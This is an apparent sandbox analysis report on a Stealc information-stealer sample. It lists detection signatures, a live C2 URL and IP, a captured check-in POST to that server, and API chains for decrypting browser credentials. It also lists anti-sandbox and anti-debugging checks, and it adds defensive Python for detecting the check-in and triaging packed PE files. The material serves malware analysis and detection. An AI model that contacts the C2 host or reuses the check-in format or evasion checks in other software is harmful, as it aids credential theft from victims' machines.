Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523789
MD5: 44397c793b2976c5571c32b11842e395
SHA1: d268ccdfb8eceb1f3ed0ccbb05f31b759528c0b7
SHA256: 004cb0e8c07cc1b3f0613d1148d353c359ceffb8e2b27da445ed0eb11456b282
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44397C793B2976C5571C32B11842E395)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions, desktop cryptocurrency wallet applications, and other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7492 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7492 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.380000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T03:10:59.743753+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.380000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpn | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/G | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpG | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00387240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00389AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00389B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00398EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 42 35 34 43 38 38 37 34 37 33 36 32 35 36 39 38 33 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a | Data Ascii: ------KJJJKFIIIJJJECAAEHDB Content-Disposition: form-data; name="hwid" 84DB54C887473625698399 ------KJJJKFIIIJJJECAAEHDB Content-Disposition: form-data; name="build" doma ------KJJJKFIIIJJJECAAEHDB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00384880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw / Data Ascii: identical to the POST body listed above
Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/.9
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/G
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%U
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9U
Source: file.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37O
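The check-in captured above is the part of this traffic a detection engineer would want to parse rather than eyeball: a POST with no User-Agent, a multipart body carrying only an hwid and a build name, sent straight to a bare IP. The script below is an added example, not Joe Sandbox or Stealc code. It rebuilds the request from the Data Raw bytes shown in the report, parses the multipart body, and matches the request against the shape seen here. The contrasting benign upload is constructed, and the "16 hex characters + .php" path rule is an assumption generalised from this one sample's C2 URL rather than a published family constant.

```python
import re
from dataclasses import dataclass, field

# Request bytes rebuilt from the "Data Raw"/"Data Ascii" capture in this report
# (the POST to /e2b1563c6670f193.php); header order follows the report.
STEALC_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------KJJJKFIIIJJJECAAEHDB\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"84DB54C887473625698399\r\n"
    b"------KJJJKFIIIJJJECAAEHDB\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------KJJJKFIIIJJJECAAEHDB--\r\n"
)

# Constructed benign upload for contrast (not from the report): a browser-style
# form post that carries a User-Agent and unrelated field names.
BENIGN_UPLOAD = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0 (constructed)\r\n"
    b"Content-Type: multipart/form-data; boundary=xyz\r\n"
    b"Content-Length: 63\r\n"
    b"\r\n"
    b"--xyz\r\n"
    b'Content-Disposition: form-data; name="f"\r\n'
    b"\r\n"
    b"1\r\n"
    b"--xyz--\r\n"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict                              # header names lower-cased
    body: bytes
    fields: dict = field(default_factory=dict)  # multipart name -> value


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Split a multipart/form-data body into {name: value}. The CRLF that
    precedes each delimiter belongs to the delimiter, so it is stripped."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):           # closing delimiter reached
            break
        part_head, sep, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if sep and name:
            if value.endswith(b"\r\n"):
                value = value[:-2]
            fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser: request line, headers, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    req = HttpRequest(method, path, headers, body)
    ctype = headers.get("content-type", "")
    boundary = re.search(r'boundary="?([^";]+)"?', ctype)
    if ctype.startswith("multipart/form-data") and boundary:
        req.fields = parse_multipart(body, boundary.group(1).encode("latin-1"))
    return req


def content_length_matches(req: HttpRequest) -> bool:
    """True when the declared Content-Length equals the captured body size."""
    return int(req.headers.get("content-length", "-1")) == len(req.body)


def is_stealc_checkin(req: HttpRequest) -> bool:
    """Shape of the check-in captured in this report: POST to /<16 hex>.php,
    no User-Agent, multipart body carrying exactly 'hwid' and 'build'.
    The 16-hex-character path rule is an assumption drawn from this sample."""
    return (
        req.method == "POST"
        and re.fullmatch(r"/[0-9a-f]{16}\.php", req.path) is not None
        and "user-agent" not in req.headers
        and req.headers.get("content-type", "").startswith("multipart/form-data")
        and set(req.fields) == {"hwid", "build"}
    )


if __name__ == "__main__":
    req = parse_http_request(STEALC_CHECKIN)
    print(req.path, req.fields, content_length_matches(req), is_stealc_checkin(req))
```

The field set is the strongest part of the match: the ET rule 2044243 that fired here keys on the same request, and a proxy or NDR that already decodes multipart bodies can apply the same three conditions without a full signature engine.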

                System Summary

Source: file.exe | Static PE information: section names: (name not rendered; see "PE file contains section with special chars"), .rsrc, .idata, (name not rendered)
Source: C:\Users\user\Desktop\file.exe | Code functions: 0_2_008138FB, 0_2_007C3892, 0_2_00743954, 0_2_0074A922, 0_2_0067C9BC, 0_2_0074C185, 0_2_0075134A, 0_2_00748B29, 0_2_00745433, 0_2_0074DC9C, 0_2_006F4D7C, 0_2_0082E54B, 0_2_0069FE5B, 0_2_00741EC7, 0_2_0067AF0B, 0_2_0063FFA5
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003845C0 appears 316 times
Source: file.exe | Static PE information: Section: xspzzdod ZLIB complexity 0.99486077813708
Source: file.exe, 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FWO3COK1.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1878016 > 1048576
Source: file.exe | Static PE information: Raw size of xspzzdod is bigger than: 0x100000 < 0x1a4600

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.380000.0.unpack | section rights in the unpacked dump: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; xspzzdod:EW; ngzkmgsa:EW; .taggant:EW | vs the original file: (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; xspzzdod:EW; ngzkmgsa:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cef4e should be: 0x1d781a
Source: file.exe | Static PE information: section names: (name not rendered), .rsrc, .idata, (name not rendered), xspzzdod, ngzkmgsa, .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C807E push 20E1ED9Ah; mov dword ptr [esp], ebp (0_2_007C8092)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078A872 push edi; mov dword ptr [esp], eax (0_2_0078A8B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039B035 push ecx; ret (0_2_0039B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D7068 push edx; mov dword ptr [esp], edi (0_2_007D7088)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076702C push edx; mov dword ptr [esp], eax (0_2_00767030)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008008FB push 7C072055h; mov dword ptr [esp], eax (0_2_0080092B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00818007 push ebx; mov dword ptr [esp], eax (0_2_00818027)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00818007 push esi; mov dword ptr [esp], ebx (0_2_0081804B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00818007 push 2885C1B0h; mov dword ptr [esp], edx (0_2_0081808C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00818007 push ebx; mov dword ptr [esp], edx (0_2_0081809E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EB0DB push edx; mov dword ptr [esp], ebx (0_2_007EB106)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EB0DB push 2714F75Fh; mov dword ptr [esp], ecx (0_2_007EB129)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EB0DB push 546BD651h; mov dword ptr [esp], eax (0_2_007EB133)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B58B1 push 6CF79A2Ch; mov dword ptr [esp], esi (0_2_007B58C8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00811852 push edi; mov dword ptr [esp], 589A4EF5h (0_2_00811896)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00811852 push 62948F00h; mov dword ptr [esp], esi (0_2_008118D3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BF8AC push ebp; mov dword ptr [esp], 2FB32BF1h (0_2_007BF8E5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BF8AC push 02BC5D5Ch; mov dword ptr [esp], edx (0_2_007BF979)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077C091 push 321B18F0h; mov dword ptr [esp], ecx (0_2_0077C099)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C3892 push eax; mov dword ptr [esp], 2BCF9900h (0_2_007C38B2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C3892 push 7C763C73h; mov dword ptr [esp], ebp (0_2_007C38EF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00783979 push 110D8F5Eh; mov dword ptr [esp], ebp (0_2_00783A23)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00783979 push 29D6C462h; mov dword ptr [esp], ecx (0_2_00783A4F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00783979 push ecx; mov dword ptr [esp], edi (0_2_00783A58)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push ebp; mov dword ptr [esp], eax (0_2_0074399B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push edx; mov dword ptr [esp], ebx (0_2_007439C8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push 4BA50807h; mov dword ptr [esp], ebp (0_2_00743A0B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push 16A98A62h; mov dword ptr [esp], ebp (0_2_00743A59)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push ebp; mov dword ptr [esp], ecx (0_2_00743AC2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push edi; mov dword ptr [esp], 5EEF0D9Ch (0_2_00743B50)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00743954 push 7A8F7AD1h; mov dword ptr [esp], eax (0_2_00743B79)
Source: file.exe | Static PE information: section name: xspzzdod entropy: 7.952856014840197
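The static findings in this section (sections with unprintable names, an entry point in .taggant instead of a code section, a stored checksum of 0x1cef4e against a computed 0x1d781a, and the 7.95-entropy xspzzdod section) are the cheap checks worth automating before a sample ever runs. The script below is an added example, not Joe Sandbox's own code. It implements the checksum recalculation (the CheckSumMappedFile algorithm, as pefile's generate_checksum also implements it), a byte-entropy function, and a section triage that reproduces this report's verdicts from its section table. The 7.2 entropy threshold, the section-name sets and the finding texts are assumptions; the section rights are the on-disk rights listed above.

```python
import math

# Section names a normal MSVC/MinGW-built PE uses; anything else is worth a look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".gfids"}
CODE_SECTIONS = {".text", "CODE"}          # where an entry point normally lives
PACKED_ENTROPY = 7.2                       # assumed threshold, bits per byte

# Section table of file.exe as reported above: (name, entropy if reported,
# on-disk rights). Two names are not rendered in the report and are left empty.
FILE_EXE_SECTIONS = [
    ("", None, "ER"),
    (".rsrc", None, "W"),
    (".idata", None, "W"),
    ("", None, "EW"),
    ("xspzzdod", 7.952856014840197, "EW"),
    ("ngzkmgsa", None, "EW"),
    (".taggant", None, "EW"),
]


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum with the CheckSumMappedFile
    algorithm: sum the file as little-endian dwords, skipping the stored
    checksum dword, fold carries down to 16 bits, then add the file length.
    checksum_offset must be 4-byte aligned, as it is in a real PE header."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += int.from_bytes(padded[off:off + 4], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage_sections(sections, entry_section, stored_checksum, computed_checksum):
    """Return (subject, reason) findings for the static signatures this report
    fired: odd or non-printable names, high entropy, writable+executable
    sections, an entry point outside a code section, a checksum mismatch."""
    findings = []
    for name, entropy, rights in sections:
        label = name or "<unnamed>"
        if not name or not name.isprintable():
            findings.append((label, "section name empty or contains special chars"))
        elif name not in STANDARD_SECTIONS:
            findings.append((label, "non-standard section name"))
        if entropy is not None and entropy > PACKED_ENTROPY:
            findings.append((label, f"entropy {entropy:.2f} suggests packed or encrypted data"))
        if "E" in rights and "W" in rights:
            findings.append((label, "section is both writable and executable"))
    if entry_section not in CODE_SECTIONS:
        findings.append((entry_section, "entry point outside a standard code section"))
    if stored_checksum != computed_checksum:
        findings.append(("checksum",
                         f"stored 0x{stored_checksum:x} != computed 0x{computed_checksum:x}"))
    return findings


if __name__ == "__main__":
    for subject, reason in triage_sections(FILE_EXE_SECTIONS, ".taggant", 0x1CEF4E, 0x1D781A):
        print(f"{subject:12} {reason}")
```

On a real file the checksum offset is e_lfanew + 4 (signature) + 20 (file header) + 0x40, and the stored value is read from that same dword before it is skipped; a mismatch is common in packed or patched binaries and rare in signed vendor builds, which is why it is a useful but not decisive signal.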

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13210)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75A89B second address: 75A8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F701CDA8A66h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F701CDA8A6Ch 0x00000016 jmp 00007F701CDA8A79h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759C1C second address: 759C22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759EBC second address: 759EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
